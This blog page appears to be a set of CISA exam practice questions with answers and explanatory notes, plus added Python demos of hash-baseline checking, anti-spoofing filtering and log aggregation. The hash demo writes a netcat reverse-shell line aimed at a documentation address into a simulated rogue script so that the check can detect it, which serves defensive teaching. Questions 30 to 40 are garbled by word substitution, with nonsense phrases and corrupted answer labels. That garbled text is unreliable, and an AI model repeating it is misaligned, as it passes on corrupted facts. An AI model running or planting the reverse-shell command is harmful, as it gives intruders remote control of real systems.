Wednesday, July 17, 2019

CISA

1. A benefit of open system architecture is that it
A. facilitates interoperability.
B. facilitates the integration of proprietary components.
C. will be a basis for volume discounts from equipment vendors.
D. allows for the achievement of more economies of scale for equipment.
ANSWER: A
NOTE: Open systems are those for which suppliers provide components whose interfaces are defined by public standards, thus facilitating interoperability between systems made by different vendors. In contrast, closed system components are built to proprietary standards so that other suppliers' systems cannot or will not interface with existing systems.

2. An IS auditor discovers that developers have operator access to the command line of a production environment operating system. Which of the following controls would BEST mitigate the risk of undetected and unauthorized program changes to the production environment?
A. Commands typed on the command line are logged
B. Hash keys are calculated periodically for programs and matched against hash keys calculated for the most recent authorized versions of the programs
C. Access to the operating system command line is granted through an access restriction tool with preapproved rights
D. Software development tools and compilers have been removed from the production environment
ANSWER: B
NOTE: Matching hash keys over time allows detection of changes to files. Choice A is incorrect because having a log is not a control; reviewing the log is a control. Choice C is incorrect because the access has already been granted; it does not matter how. Choice D is incorrect because files can be copied to and from the production environment.
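The following is an added example, not part of the question bank, showing what choice B of question 2 looks like in practice: a baseline of SHA-256 digests is taken from the authorized release, a later run re-hashes the production directory, and anything modified, added or removed is reported for investigation. The directory layout, file names and file contents are constructed for the demonstration.

```python
"""Periodic hash comparison of production programs against an authorized baseline.

Added example (not from the question bank). The program files below are constructed.
"""
from __future__ import annotations

import hashlib
import tempfile
from pathlib import Path


def hash_file(path: Path, chunk_size: int = 65536) -> str:
    """Return the hex SHA-256 digest of a file, streaming it in chunks."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(root: Path) -> dict[str, str]:
    """Map every file under root (relative POSIX path) to its digest."""
    return {
        p.relative_to(root).as_posix(): hash_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def compare(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Diff two snapshots. Any non-empty list is an unauthorized change to investigate."""
    return {
        "modified": sorted(f for f in baseline if f in current and baseline[f] != current[f]),
        "added": sorted(f for f in current if f not in baseline),
        "removed": sorted(f for f in baseline if f not in current),
    }


def demo() -> dict[str, list[str]]:
    """Create an authorized release, take the baseline, then simulate a developer
    editing one program from the command line and dropping in a new one."""
    with tempfile.TemporaryDirectory() as tmp:
        prod = Path(tmp)
        (prod / "bin").mkdir()
        # Constructed "authorized" versions
        (prod / "bin" / "payroll.sh").write_text("#!/bin/sh\nrun_payroll --month current\n")
        (prod / "bin" / "report.sh").write_text("#!/bin/sh\nbuild_report\n")
        baseline = snapshot(prod)  # stored with the release; kept out of reach of developers

        # Unauthorized changes made after the baseline was taken
        (prod / "bin" / "payroll.sh").write_text(
            "#!/bin/sh\nrun_payroll --month current --bonus-account 4711\n"
        )
        (prod / "bin" / "helper.sh").write_text("#!/bin/sh\nnc -e /bin/sh 203.0.113.9 4444\n")

        return compare(baseline, snapshot(prod))


if __name__ == "__main__":
    for kind, files in demo().items():
        print(f"{kind}: {files}")
```

The baseline digests must be stored where the developers being monitored cannot rewrite them, otherwise the comparison only proves that the files match whatever was last planted in the baseline.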
3. In the context of effective information security governance, the primary objective of value delivery is to
A. optimize security investments in support of business objectives.
B. implement a standard set of security practices.
C. institute a standards-based solution.
D. implement a continuous improvement culture.
ANSWER: A
NOTE: In the context of effective information security governance, value delivery is implemented to ensure optimization of security investments in support of business objectives. The tools and techniques for implementing value delivery include implementation of a standard set of security practices, institutionalization and commoditization of standards-based solutions, and implementation of a continuous improvement culture, considering security as a process, not an end.

4. During a review of a business continuity plan, an IS auditor noticed that the point at which a situation is declared to be a crisis has not been defined. The MAJOR risk associated with this is that
A. assessment of the situation may be delayed.
B. execution of the disaster recovery plan could be impacted.
C. notification of the teams might not occur.
D. potential crisis recognition might be ineffective.
ANSWER: B
NOTE: Execution of the business continuity plan would be impacted if the organization does not know when to declare a crisis. Choices A, C and D are steps that must be performed to know whether to declare a crisis. Problem and severity assessment would provide the information necessary for declaring a disaster. Once a potential crisis is recognized, the teams responsible for crisis management need to be notified. Delaying this step until a disaster has been declared would negate the effect of having response teams. Potential crisis recognition is the first step in responding to a disaster.
5. When implementing an IT governance framework in an organization, the MOST important objective is
A. IT alignment with the business.
B. accountability.
C. value realization with IT.
D. enhancing the return on IT investments.
ANSWER: A
NOTE: The goals of IT governance are to improve IT performance, to deliver optimum business value and to ensure regulatory compliance. The key practice in support of these goals is the strategic alignment of IT with the business (choice A). To achieve alignment, all other choices need to be tied to business practices and strategies.

6. When reviewing an implementation of a VoIP system over a corporate WAN, an IS auditor should expect to find
A. an integrated services digital network (ISDN) data link.
B. traffic engineering.
C. wired equivalent privacy (WEP) encryption of data.
D. analog phone terminals.
ANSWER: B
NOTE: To ensure that quality of service requirements are achieved, the Voice-over IP (VoIP) service over the wide area network (WAN) should be protected from packet loss, latency and jitter. To reach this objective, network performance can be managed using statistical techniques such as traffic engineering. The standard bandwidth of an integrated services digital network (ISDN) data link would not provide the quality of service required for corporate VoIP services. WEP is an encryption scheme related to wireless networking. VoIP phones are usually connected to a corporate local area network (LAN) and are not analog.

7. An IS auditor selects a server for a penetration test that will be carried out by a technical specialist. Which of the following is MOST important?
A. The tools used to conduct the test
B. Certifications held by the IS auditor
C. Permission from the data owner of the server
D. An intrusion detection system (IDS) is enabled
ANSWER: C
NOTE: The data owner should be informed of the risks associated with a penetration test, what types of tests are to be conducted and other relevant details. The other choices are not as important as the data owner's responsibility for the security of the data assets.

8. Which of the following is a risk of cross-training?
A. Increases the dependence on one employee
B. Does not assist in succession planning
C. One employee may know all parts of a system
D. Does not help in achieving a continuity of operations
ANSWER: C
NOTE: When cross-training, it would be prudent to first assess the risk of any person knowing all parts of a system and what exposures this may cause. Cross-training has the advantage of decreasing dependence on one employee and, hence, can be part of succession planning. It also provides backup for personnel in the event of absence for any reason and thereby facilitates the continuity of operations.

9. The use of digital signatures
A. requires the use of a one-time password generator.
B. provides encryption to a message.
C. validates the source of a message.
D. ensures message confidentiality.
ANSWER: C
NOTE: A digital signature verifies the identity of the sender, but does not encrypt the message, and hence is not enough to ensure confidentiality. A one-time password generator is an option, but is not a requirement for using digital signatures.

10. A retail outlet has introduced radio frequency identification (RFID) tags to create unique serial numbers for all products. Which of the following is the PRIMARY concern associated with this initiative?
A. Issues of privacy
B. Wavelength can be absorbed by the human body
C. RFID tags may not be removable
D. RFID eliminates line-of-sight reading
ANSWER: A
NOTE: The purchaser of an item will not necessarily be aware of the presence of the tag. If a tagged item is paid for by credit card, it would be possible to tie the unique ID of that item to the identity of the purchaser. Privacy violations are a significant concern because RFID can carry unique identifier numbers. If desired, it would be possible for a firm to track individuals who purchase an item containing an RFID tag. Choices B and C are concerns of less importance. Choice D is not a concern.

11. A lower recovery time objective (RTO) results in
A. higher disaster tolerance.
B. higher cost.
C. wider interruption windows.
D. more permissive data loss.
ANSWER: B
NOTE: A recovery time objective (RTO) is based on the acceptable downtime in case of a disruption of operations. The lower the RTO, the higher the cost of the recovery strategies. The lower the disaster tolerance, the narrower the interruption windows, and the less permissive the data loss.

12. During the requirements definition phase of a software development project, the aspects of software testing that should be addressed are developing
A. test data covering critical applications.
B. detailed test plans.
C. quality assurance test specifications.
D. user acceptance testing specifications.
ANSWER: D
NOTE: A key objective in any software development project is to ensure that the developed software will meet the business objectives and the requirements of the user. The users should be involved in the requirements definition phase of a development project, and user acceptance test specifications should be developed during this phase. The other choices are generally performed during the system testing phase.
13. The BEST filter rule for protecting a network from being used as an amplifier in a denial of service (DoS) attack is to deny all
A. outgoing traffic with IP source addresses external to the network.
B. incoming traffic with discernible spoofed IP source addresses.
C. incoming traffic with IP options set.
D. incoming traffic to critical hosts.
ANSWER: A
NOTE: Outgoing traffic with an IP source address outside the IP range of the network is invalid. In most cases it signals a DoS attack originated by an internal user or by a previously compromised internal machine; in both cases, applying this filter stops the spoofed traffic at the border. Note that the rule only catches the spoofed variant: an internal host flooding a target with its own genuine source address passes the filter and has to be caught by rate limiting or by cleaning up the host.

14. What is the BEST backup strategy for a large database with data supporting online sales?
A. Weekly full backup with daily incremental backup
B. Daily full backup
C. Clustered servers
D. Mirrored hard disks
ANSWER: A
NOTE: Weekly full backup and daily incremental backup is the best backup strategy; it ensures the ability to recover the database and yet reduces the daily backup time requirements. A full backup usually requires a couple of hours, and therefore it can be impractical to conduct a full backup every day. Clustered servers provide redundant processing capability, but are not a backup. Mirrored hard disks will not provide a backup in case of disaster.

15. Which of the following is a feature of Wi-Fi Protected Access (WPA) in wireless networks?
A. Session keys are dynamic
B. Private symmetric keys are used
C. Keys are static and shared
D. Source addresses are not encrypted or authenticated
ANSWER: A
NOTE: WPA uses dynamic session keys, achieving stronger encryption than wired equivalent privacy (WEP), which operates with static keys (the same key is used for everyone in the wireless network). All other choices are weaknesses of WEP.

16. The ultimate purpose of IT governance is to
A. encourage optimal use of IT.
B. reduce IT costs.
C. decentralize IT resources across the organization.
D. centralize control of IT.
ANSWER: A
NOTE: IT governance is intended to specify the combination of decision rights and accountability that is best for the enterprise. It is different for every enterprise. Reducing IT costs may not be the best IT governance outcome for an enterprise. Decentralizing IT resources across the organization is not always desired, although it may be desired in a decentralized environment. Centralizing control of IT is not always desired. An example of where it might be desired is an enterprise desiring a single point of customer contact.

17. The MAIN purpose of a transaction audit trail is to
A. reduce the use of storage media.
B. determine accountability and responsibility for processed transactions.
C. help an IS auditor trace transactions.
D. provide useful information for capacity planning.
ANSWER: B
NOTE: Enabling audit trails aids in establishing the accountability and responsibility for processed transactions by tracing them through the information system. Enabling audit trails increases the use of disk space. A transaction log file would be used to trace transactions, but would not aid in determining accountability and responsibility. The objective of capacity planning is the efficient and effective use of IT resources and requires information such as CPU utilization, bandwidth, number of users, etc.

18. An IS auditor invited to a development project meeting notes that no project risks have been documented. When the IS auditor raises this issue, the project manager responds that it is too early to identify risks and that, if risks do start impacting the project, a risk manager will be hired. The appropriate response of the IS auditor would be to
A. stress the importance of spending time at this point in the project to consider and document risks, and to develop contingency plans.
B. accept the project manager's position, as the project manager is accountable for the outcome of the project.
C. offer to work with the risk manager when one is appointed.
D. inform the project manager that the IS auditor will conduct a review of the risks at the completion of the requirements definition phase of the project.
ANSWER: A
NOTE: The majority of project risks can typically be identified before a project begins, allowing mitigation/avoidance plans to be put in place to deal with these risks. A project should have a clear link back to corporate strategy and tactical plans to support this strategy. The process of setting corporate strategy, setting objectives and developing tactical plans should include the consideration of risks. Appointing a risk manager is a good practice, but waiting until the project has been impacted by risks is misguided. Risk management needs to be forward looking; allowing risks to evolve into issues that adversely impact the project represents a failure of risk management. With or without a risk manager, persons within and outside of the project team need to be consulted and encouraged to comment when they believe new risks have emerged or risk priorities have changed. The IS auditor has an obligation to the project sponsor and the organization to advise on appropriate project management practices. Waiting for the possible appointment of a risk manager represents an unnecessary and dangerous delay to implementing risk management.

19. A data center has a badge-entry system. Which of the following is MOST important to protect the computing assets in the center?
A. Badge readers are installed in locations where tampering would be noticed
B. The computer that controls the badge system is backed up frequently
C. A process for promptly deactivating lost or stolen badges exists
D. All badge entry attempts are logged
ANSWER: C
NOTE: Tampering with a badge reader cannot open the door, so this is irrelevant. Logging the entry attempts may be of limited value. The biggest risk is from unauthorized individuals who can enter the data center, whether they are employees or not. Thus, a process for deactivating lost or stolen badges is important. The configuration of the system does not change frequently, therefore frequent backup is not necessary.

20. Which of the following would impair the independence of a quality assurance team?
A. Ensuring compliance with development methods
B. Checking the testing assumptions
C. Correcting coding errors during the testing process
D. Checking the code to ensure proper documentation
ANSWER: C
NOTE: Correction of code should not be a responsibility of the quality assurance team, as it would not ensure segregation of duties and would impair the team's independence. The other choices are valid quality assurance functions.

21. Which of the following is the BEST type of program for an organization to implement to aggregate, correlate and store different log and event files, and then produce weekly and periodic reports for IS auditors?
A. A security information event management (SIEM) product
B. An open-source correlation engine
C. A log management tool
D. An extract, transform, load (ETL) system
ANSWER: C
NOTE: A log management tool is a product designed to aggregate events from many log files (with distinct formats and from different sources), store them and typically correlate them offline to produce many reports (e.g., exception reports showing different statistics including anomalies and suspicious activities), and to answer time-based queries (e.g., how many users have entered the system between 2 a.m. and 4 a.m. over the past three weeks?). A SIEM product has some similar features. It correlates events from log files, but does so online and normally is not oriented to storing many weeks of historical information and producing audit reports. A correlation engine is part of a SIEM product. It is oriented to making an online correlation of events. An extract, transform, load (ETL) system is part of a business intelligence system, dedicated to extracting operational or production data, transforming that data and loading it into a central repository (data warehouse or data mart); an ETL does not correlate data or produce reports, and normally it does not have extractors to read log file formats.

22. To ensure authentication, confidentiality and integrity of a message, the sender should encrypt the hash of the message with the sender's
A. public key and then encrypt the message with the receiver's private key.
B. private key and then encrypt the message with the receiver's public key.
C. public key and then encrypt the message with the receiver's public key.
D. private key and then encrypt the message with the receiver's private key.
ANSWER: B
NOTE: Obtaining the hash of the message ensures integrity; signing the hash of the message with the sender's private key ensures the authenticity of the origin; and encrypting the resulting message with the receiver's public key ensures confidentiality. The other choices are incorrect.

23. An IS auditor observes a weakness in the tape management system at a data center in that some parameters are set to bypass or ignore tape header records. Which of the following is the MOST effective compensating control for this weakness?
A. Staging and job set up
B. Supervisory review of logs
C. Regular backup of tapes
D. Offsite storage of tapes
ANSWER: A
NOTE: If the IS auditor finds that there are effective staging and job set up processes, this can be accepted as a compensating control. Choice B is a detective control, while choices C and D are corrective controls, none of which would serve as good compensating controls.
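The following is an added example, not part of the question bank, illustrating the filter rule from question 13. It implements the egress rule of choice A (drop outbound packets whose source address is not one of the site's own prefixes, which is what lets a compromised internal host use the site as a reflector) and, going one step beyond the question, the complementary ingress rule (drop inbound packets that claim one of the site's own prefixes as their source). The prefixes, the packets and the `Packet`/`EdgeFilter` names are constructed for the demonstration; a real deployment expresses the same two rules as firewall or router ACLs.

```python
"""Anti-spoofing (BCP 38 style) filter rules at a network border.

Added example (not from the question bank). Prefixes and packets are constructed;
192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, 2001:db8::/32 and 3fff::/20 are
documentation ranges.
"""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    direction: str  # "egress" = leaving our network, "ingress" = arriving from outside
    src: str
    dst: str


class EdgeFilter:
    """Source-address sanity rules for one site border."""

    def __init__(self, internal_prefixes: list[str]) -> None:
        self.internal = [ipaddress.ip_network(p) for p in internal_prefixes]

    def is_internal(self, address: str) -> bool:
        ip = ipaddress.ip_address(address)
        # 'in' is False when the address family differs, so v4 and v6 can be mixed.
        return any(ip in net for net in self.internal)

    def verdict(self, pkt: Packet) -> str:
        if pkt.direction not in ("egress", "ingress"):
            raise ValueError(f"unknown direction {pkt.direction!r}")
        src_internal = self.is_internal(pkt.src)
        # Choice A: nothing may leave with a source address we do not own.
        if pkt.direction == "egress" and not src_internal:
            return "deny-egress-spoof"
        # Complement (not asked in the question): nothing may arrive claiming to be us.
        if pkt.direction == "ingress" and src_internal:
            return "deny-ingress-spoof"
        return "allow"

    def apply(self, packets: list[Packet]) -> tuple[list[tuple[Packet, str]], dict[str, int]]:
        """Return (packet, verdict) pairs plus a tally per verdict."""
        verdicts = [(pkt, self.verdict(pkt)) for pkt in packets]
        tally: dict[str, int] = {}
        for _, v in verdicts:
            tally[v] = tally.get(v, 0) + 1
        return verdicts, tally


SITE = EdgeFilter(["192.0.2.0/24", "2001:db8::/32"])

# Constructed traffic sample. Packet 2 is the amplifier case: an internal host sends
# a query to an external resolver with the victim's address (203.0.113.77) as source,
# so the large reply goes to the victim instead of back to us.
SAMPLE = [
    Packet("egress", "192.0.2.10", "198.51.100.5"),
    Packet("egress", "203.0.113.77", "198.51.100.53"),
    Packet("egress", "2001:db8::1", "3fff::1"),
    Packet("egress", "3fff:1::1", "3fff::1"),
    Packet("ingress", "198.51.100.5", "192.0.2.10"),
    Packet("ingress", "192.0.2.99", "192.0.2.10"),
]

if __name__ == "__main__":
    results, counts = SITE.apply(SAMPLE)
    for pkt, verdict in results:
        print(f"{pkt.direction:7} {pkt.src:>14} -> {pkt.dst:<14} {verdict}")
    print(counts)
```

Applying the egress rule on the router facing the provider, rather than on each host, is what makes it effective: a compromised host that has disabled its own controls still cannot get a spoofed packet past the border.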
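The following is an added example, not part of the question bank, showing the three things the note to question 21 attributes to a log management tool: events with different formats from different sources are parsed into one schema, stored, and then queried offline for a time-window question and an exception report. The two log formats, the host names, the user names and the events are constructed for the demonstration, and an in-memory SQLite database stands in for the tool's event store.

```python
"""Minimal log management pipeline: aggregate, store, query offline.

Added example (not from the question bank). Both log excerpts are constructed.
"""
from __future__ import annotations

import re
import sqlite3
from datetime import datetime
from typing import Iterable, Iterator

# Source 1: an SSH daemon log in syslog style.
SSHD_LOG = """\
2024-03-04T02:15:09Z sshd[811]: Accepted publickey for alice from 192.0.2.10 port 50022
2024-03-04T03:40:51Z sshd[815]: Accepted password for root from 203.0.113.7 port 41002
2024-03-04T09:02:13Z sshd[902]: Accepted publickey for bob from 192.0.2.11 port 50100
2024-03-05T02:58:00Z sshd[117]: Failed password for invalid user admin from 203.0.113.7 port 41990
"""

# Source 2: a web portal's login log, comma separated with a different timestamp format.
WEBAPP_LOG = """\
2024-03-04 02:30:00,portal,login_ok,carol,198.51.100.20
2024-03-04 13:05:10,portal,login_ok,alice,192.0.2.10
2024-03-05 03:10:45,portal,login_fail,dave,203.0.113.7
"""

SSHD_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: (?P<result>Accepted|Failed) \S+ for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+)"
)

# Common event schema: (timestamp, source, event, user, ip)
Event = tuple[datetime, str, str, str, str]


def parse_sshd(text: str) -> Iterator[Event]:
    """Extractor for the sshd format; unparseable lines are skipped, not guessed at."""
    for line in text.splitlines():
        m = SSHD_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        event = "login_ok" if m["result"] == "Accepted" else "login_fail"
        yield ts, "sshd", event, m["user"], m["ip"]


def parse_webapp(text: str) -> Iterator[Event]:
    """Extractor for the portal format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, source, event, user, ip = line.split(",")
        yield datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), source, event, user, ip


def build_store(*streams: Iterable[Event]) -> sqlite3.Connection:
    """Aggregate all extractors into one normalized table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE events (ts TEXT, source TEXT, event TEXT, user TEXT, ip TEXT)")
    for stream in streams:
        db.executemany(
            "INSERT INTO events VALUES (?, ?, ?, ?, ?)",
            ((ts.isoformat(), s, e, u, ip) for ts, s, e, u, ip in stream),
        )
    db.commit()
    return db


def logons_in_window(db: sqlite3.Connection, start_hour: int, end_hour: int) -> list[str]:
    """Time-based query: who logged on between two hours of the day, across all sources?"""
    rows = db.execute(
        "SELECT DISTINCT user FROM events WHERE event = 'login_ok' "
        "AND CAST(strftime('%H', ts) AS INTEGER) >= ? "
        "AND CAST(strftime('%H', ts) AS INTEGER) < ? ORDER BY user",
        (start_hour, end_hour),
    ).fetchall()
    return [r[0] for r in rows]


def exception_report(db: sqlite3.Connection) -> list[dict[str, object]]:
    """Offline correlation: addresses with repeated failed logons, counting how many
    distinct sources saw them (a hit in more than one source is the interesting case)."""
    rows = db.execute(
        "SELECT ip, COUNT(*) AS n, COUNT(DISTINCT source) AS sources FROM events "
        "WHERE event = 'login_fail' GROUP BY ip HAVING COUNT(*) >= 2 ORDER BY n DESC"
    ).fetchall()
    return [{"ip": ip, "failures": n, "sources": srcs} for ip, n, srcs in rows]


if __name__ == "__main__":
    store = build_store(parse_sshd(SSHD_LOG), parse_webapp(WEBAPP_LOG))
    print("logons between 02:00 and 04:00:", logons_in_window(store, 2, 4))
    print("repeated failures:", exception_report(store))
```

The normalization step is where the real tools earn their keep: once both sources share one schema, the same query serves the auditor's "who logged on at night" question whether the events came from sshd, the portal or a third source added later.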
24. What is the MOST prevalent security risk when an organization implements remote virtual private network (VPN) access to its network?
A. Malicious code could be spread across the network
B. VPN logon could be spoofed
C. Traffic could be sniffed and decrypted
D. VPN gateway could be compromised
ANSWER: A
NOTE: VPN is a mature technology; VPN devices are hard to break. However, when remote access is enabled, malicious code on a remote client could spread to the organization's network. Though choices B, C and D are security risks, VPN technology largely mitigates these risks.

25. The activation of an enterprise's business continuity plan should be based on predetermined criteria that address the
A. duration of the outage.
B. type of outage.
C. probability of the outage.
D. cause of the outage.
ANSWER: A
NOTE: The initiation of a business continuity plan (action) should primarily be based on the maximum period for which a business function can be disrupted before the disruption threatens the achievement of organizational objectives.

26. After observing suspicious activities on a server, a manager requests a forensic analysis. Which of the following findings should be of MOST concern to the investigator?
A. Server is a member of a workgroup and not part of the server domain
B. Guest account is enabled on the server
C. Recently, 100 users were created on the server
D. Audit logs are not enabled for the server
ANSWER: D
NOTE: Audit logs can provide evidence which is essential to proceed with an investigation and should not be disabled. For business needs, a server can be a member of a workgroup and, therefore, this is not a concern. Having a guest account enabled on a system is a poor security practice but not a forensic investigation concern. Recently creating 100 users on the server may have been required to meet business needs and should not be a concern.
27. Minimum password length and password complexity verification are examples of
A. detection controls.
B. control objectives.
C. audit objectives.
D. control procedures.
ANSWER: D
NOTE: Control procedures are practices established by management to achieve specific control objectives. Password controls are preventive controls, not detective controls. Control objectives are declarations of expected results from implementing controls, and audit objectives are the specific goals of an audit.

28. Which of the following is an advantage of the top-down approach to software testing?
A. Interface errors are identified early
B. Testing can be started before all programs are complete
C. It is more effective than other testing approaches
D. Errors in critical modules are detected sooner
ANSWER: A
NOTE: The advantage of the top-down approach is that tests of major functions are conducted early, thus enabling the detection of interface errors sooner. The most effective testing approach is dependent on the environment being tested. Choices B and D are advantages of the bottom-up approach to system testing.

29. After initial investigation, an IS auditor has reasons to believe that fraud may be present. The IS auditor should
A. expand activities to determine whether an investigation is warranted.
B. report the matter to the audit committee.
C. report the possibility of fraud to top management and ask how they would like to proceed.
D. consult with external legal counsel to determine the course of action to be taken.
ANSWER: A
NOTE: An IS auditor's responsibilities for detecting fraud include evaluating fraud indicators and deciding whether any additional action is necessary or whether an investigation should be recommended. The IS auditor should notify the appropriate authorities within the organization only if it has been determined that the indicators of fraud are sufficient to recommend an investigation. Normally, the IS auditor does not have authority to consult with external legal counsel.
As a device driftr of IT governance, transparency of ITs cost, value and risks is principally achieved through A. writ of execution measurement. B. strategic alignment. C. value delivery. D. resource management. break apart A NOTE carrying into action measurement accepts setting and monitor mensurable objectives of what the IT processes need to deliver (process outcome) and how they deliver it (process capability and performance). Strategic alignment in the main focuses on ensuring linkage of business and IT plans.Value delivery is or so executing the value proposition passim the delivery steering wheel. Resource management is rough the optimal investment in and proper management of critical IT resources. Transparency is primarily achieved through performance measurement as it provides information to the stakeholders on how hearty the enterprise is performing when compared to objectives. 31. A technical hold out who was running(a) on a major project has left the organization. The project manager reports suspicious system activities on one of the servers that is regainible to the whole team.What would be of great concern if discovered during a forensic investigation? A. Audit logs are not enabled for the system B. A logon ID for the technical peak still exists C. Spyware is installed on the system D. A Trojan is installed on the system cause A NOTE Audit logs are critical to the investigation of the event however, if not enabled, misuse of the logon ID of the technical lead and the client account could not be established. The logon ID of the technical lead should have been deleted as soon as the employee left the organization but, without audit logs, misuse of the ID is difficult to prove.Spyware installed on the system is a concern but could have been installed by any user and, again, without the aim of logs, discovering who installed the spyware is difficult. 
A Trojan inst alled on the system is a concern, but it can be done by any user as it is introductionible to the whole group and, without the posture of logs, investigation would be difficult. 32. When utilize a universal storage bus (USB) inexpensive drive to transport confidential corporate data to an off rank location, an effective control would be to A. carry the second drive in a movable beneficial. B. severalise management that you will not unload the flash drive. C. equest that management deliver the flash drive by courier. D. encrypt the pamphlet containing the data with a strong key. adjudicate D NOTE encryption, with a strong key, is the most secure order for protecting the information on the flash drive. Carrying the flash drive in a portable safe does not guarantee the synthetic rubber of the information in the event that the safe is stolen or lost. No matter what measures you take, the chance of losing the flash drive still exists. It is practical that a courier might l ose the flash drive or that it might be stolen. 33. The first-year step in a lucky attack to a system would be A. gathering information. B. aining entrance. C. denying services. D. evading detection. dissolver A NOTE Successful attacks start by gathering information approximately the target system. This is done in kindle so that the attacker gets to know the target systems and their vulnerabilities. All of the other choices are based on the information gathered. 34. An IS auditor finds that conference cortege have active network ports. Which of the following is MOST important to ensure? A. The corporate network is using an intrusion barroom system (IPS) B. This part of the network is isolated from the corporate network C. 
A single sign-on has been implemented in the corporate network D.Antivirus software is in place to protect the corporate network declaration B NOTE If the conference inhabits have assenting to the corporate network, unauthorized users may be able to co nnect to the corporate network therefore, both networks should be isolated either via a firewall or being physically separated. An IPS would detect possible attacks, but only after they have occurred. A single sign-on would ease authentication management. Antivirus software would reduce the impact of possible viruses however, unauthorized users would still be able to approach path the corporate network, which is the biggest risk. 5. temporary hookup observing a full pretension of the business continuity plan, an IS auditor notices that the notification systems at heart the organizational facilities could be poorly impacted by infrastructural damage. The BEST preachation the IS auditor can provide to the organization is to ensure A. the salvage team is trained to use the notification system. B. the notification system provides for the recovery of the backup. C. redundancies are built into the notification system. D. the notification systems are stored in a vault. break up CNOT E If the notification system has been severely impacted by the damage, redundancy would be the best control. The salvage team would not be able to use a severely damaged notification system, even if they are trained to use it. The recovery of the backups has no bearing on the notification system and storing the notification system in a vault would be of little value if the building is damaged. 36. The human resources (HR) department has essential a system to allow employees to infix in benefits via a web site on the corporate Intranet. Which of the following would protect the confidentiality of the data?A. SSL encryption B. Two-factor authentication C. Encrypted session cookies D. 
IP address verification serve A NOTE The main risk in this scenario is confidentiality, therefore the only option which would provide confidentiality is Secure Socket Layer (SSL) encryption. The stay options deal with authentication issues. 37. Regarding a disaster recovery plan, the role of an IS audi tor should include A. identifying critical applications programmes. B. ascertain the external service providers involved in a recovery test. C. observing the tests of the disaster recovery plan. D. etermining the criteria for establishing a recovery time objective (RTO). serve well C NOTE The IS auditor should be present when disaster recovery plans are tested, to ensure that the test meets the targets for restoration, and the recovery procedures are effective and efficient. As appropriate, the auditor should provide a report of the test results. All other choices are a responsibility of management. 38. Which of the following is the BEST practice to ensure that admission price authorizations are still valid? A. Information owner provides authorization for users to gain entryway B. Identity management is amalgamated with human resource processes C.Information owners periodically recapitulation the advance controls D. An authorization matrix is used to establish validity of ad mission ANSWER B NOTE Personnel and departmental changes can result in authorization creep and can impact the dominance of access controls. Many times when force out leave an organization, or employees are promoted, transferred or demoted, their system access is not full removed, which increases the risk of unauthorized access. The best practices for ensuring access authorization is still valid is to integrate identity management with human resources processes.When an employee transfers to a different function, access rights are modify at the same time. 39. The application systems of an organization using open-source software have no single recognized developer producing patches. 
Which of the following would be the MOST secure way of updating open-source software? A. revise the patches and apply them B. autograph recap and application of available patches C. Develop in-house patches D. Identify and test suitable patches before applying them ANSWER D NOTE Suitable patches from the existing developers should be selected and tested before applying them.Rewriting the patches and applying them is not a correct answer because it would require skilled resources and time to rewrite the patches. Code round off could be possible but tests need to be performed before applying the patches. Since the system was developed outside the organization, the IT department may not have the necessary skills and resources to develop patches. 40. Which of the following is a prevalent risk in the development of end-user computing (EUC) applications? A. Applications may not be subject to testing and IT general controls B. change magnitude development and guardianship costsC. Increased application development time D. Decision-making may be impaired referable to otiose re bodily function to requests for information ANSWER A NOTE End-user developed applications may not be subjected to an independent outside review by systems analysts and frequently are not created in the conte xt of a imposing development methodology. These applications may lack appropriate standards, controls, quality assurance procedures, and documentation. A risk of end-user applications is that management may rely on them as much as handed-down applications.End-user computing (EUC) systems typically result in reduced application development and victuals costs, and a reduced development cycle time. EUC systems normally increase flexibility and responsiveness to managements information requests. 41. The MAJOR friendliness for an IS auditor reviewing an organizations IT project portfolio is the A. IT budget. B. existing IT environment. C. business plan. D. investment plan. 
ANSWER: C
NOTE: One of the most important reasons for which projects get funded is how well a project meets an organization's strategic objectives. Portfolio management takes a holistic view of a company's overall IT strategy. IT strategy should be aligned with the business strategy and, hence, reviewing the business plan should be the major consideration. Choices A, B and D are important but secondary to the importance of reviewing the business plan.

42. Which of the following is an attribute of the control self-assessment (CSA) approach?
A. Broad stakeholder involvement
B. Auditors are the primary control analysts
C. Limited employee participation
D. Policy driven
ANSWER: A
NOTE: The control self-assessment (CSA) approach emphasizes management of and accountability for developing and monitoring the controls of an organization's business processes. The attributes of CSA include empowered employees, continuous improvement, extensive employee participation and training, all of which are representations of broad stakeholder involvement. Choices B, C and D are attributes of a traditional audit approach.

43. The BEST method for assessing the effectiveness of a business continuity plan is to review the
A. plans and compare them to appropriate standards.
B. results from previous tests.
C. emergency procedures and employee training.
D. offsite storage and environmental controls.
ANSWER: B
NOTE: Previous test results will provide evidence of the effectiveness of the business continuity plan. Comparisons to standards will give some assurance that the plan addresses the critical aspects of a business continuity plan but will not reveal anything about its effectiveness. Reviewing emergency procedures, offsite storage and environmental controls would provide insight into some aspects of the plan but would fall short of providing assurance of the plan's overall effectiveness.

44. An organization has just finished their annual risk assessment.
Regarding the business continuity plan, what should an IS auditor recommend as the next step for the organization?
A. Review and evaluate the business continuity plan for adequacy
B. Perform a full simulation of the business continuity plan
C. Train and educate employees regarding the business continuity plan
D. Notify critical contacts in the business continuity plan
ANSWER: A
NOTE: The business continuity plan should be reviewed every time a risk assessment is completed for the organization. Training of the employees and a simulation should be performed after the business continuity plan has been deemed adequate for the organization. There is no reason to notify the business continuity plan contacts at this time.

45. Which of the following insurance types provide for a loss arising from fraudulent acts by employees?
A. Business interruption
B. Fidelity coverage
C. Errors and omissions
D. Extra expense
ANSWER: B
